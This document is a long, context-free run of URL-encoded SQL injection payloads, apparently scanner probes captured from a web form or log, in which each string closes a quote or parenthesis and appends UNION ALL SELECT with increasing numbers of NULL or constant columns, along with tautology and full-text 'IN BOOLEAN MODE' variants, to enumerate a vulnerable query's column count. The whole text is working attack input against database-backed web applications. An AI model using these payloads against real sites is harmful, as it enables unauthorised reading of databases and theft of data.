1%27%20%2B%20%28SELECT%20%27tWco%27%20WHERE%203477%3D3477%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27FulK%27%20WHERE%206596%3D6596%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27nkdr%27%20WHERE%202157%3D2157%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27tVex%27%20WHERE%205046%3D5046%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27YbTO%27%20WHERE%206785%3D6785%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27keLZ%27%20WHERE%208737%3D8737%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27FTvR%27%20WHERE%208844%3D8844%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ZhSA%27%20WHERE%202650%3D2650%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mjZh%27%20WHERE%202368%3D2368%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jrOh%27%20WHERE%208662%3D8662%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -9092%29%20UNION%20ALL%20SELECT%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941%2C%208941--%20 -4732%29%20UNION%20ALL%20SELECT%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713--%20 -7466%29%20UNION%20ALL%20SELECT%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152%2C%204152--%20 -2155%29%20UNION%20ALL%20SELECT%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487--%20 -2712%29%20UNION%20ALL%20SELECT%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469--%20 -5644%29%20UNION%20ALL%20SELECT%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444%2C%206444--%20 -8896%29%20UNION%20ALL%20SELECT%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273--%20 -9476%29%20UNION%20ALL%20SELECT%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909%2C%208909--%20 -9015%29%20UNION%20ALL%20SELECT%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826%2C%204826--%20 -6106%29%20UNION%20ALL%20SELECT%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529%2C%203529--%20 -4197%27%29%20UNION%20ALL%20SELECT%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308%2C%203308--%20 -7598%27%29%20UNION%20ALL%20SELECT%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838%2C%202838--%20 -7683%27%29%20UNION%20ALL%20SELECT%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449--%20 -7710%27%29%20UNION%20ALL%20SELECT%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622--%20 -2718%27%29%20UNION%20ALL%20SELECT%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384--%20 -3103%27%29%20UNION%20ALL%20SELECT%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183%2C%206183--%20 -4429%27%29%20UNION%20ALL%20SELECT%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693%2C%209693--%20 -1520%27%29%20UNION%20ALL%20SELECT%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773%2C%201773--%20 -5681%27%29%20UNION%20ALL%20SELECT%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089%2C%208089--%20 -7325%27%29%20UNION%20ALL%20SELECT%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599--%20 -3428%27%20UNION%20ALL%20SELECT%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443--%20 -3132%27%20UNION%20ALL%20SELECT%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050--%20 -8626%27%20UNION%20ALL%20SELECT%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855%2C%203855--%20 -8392%27%20UNION%20ALL%20SELECT%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158--%20 -6917%27%20UNION%20ALL%20SELECT%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307%2C%207307--%20 -6873%27%20UNION%20ALL%20SELECT%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637%2C%206637--%20 -9026%27%20UNION%20ALL%20SELECT%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185--%20 -6065%27%20UNION%20ALL%20SELECT%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855--%20 -6723%27%20UNION%20ALL%20SELECT%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404--%20 -9519%27%20UNION%20ALL%20SELECT%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845--%20 -3900%22%20UNION%20ALL%20SELECT%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036%2C%206036--%20 -1663%22%20UNION%20ALL%20SELECT%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628%2C%203628--%20 -5732%22%20UNION%20ALL%20SELECT%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143--%20 -9948%22%20UNION%20ALL%20SELECT%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584%2C%208584--%20 -4845%22%20UNION%20ALL%20SELECT%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642%2C%206642--%20 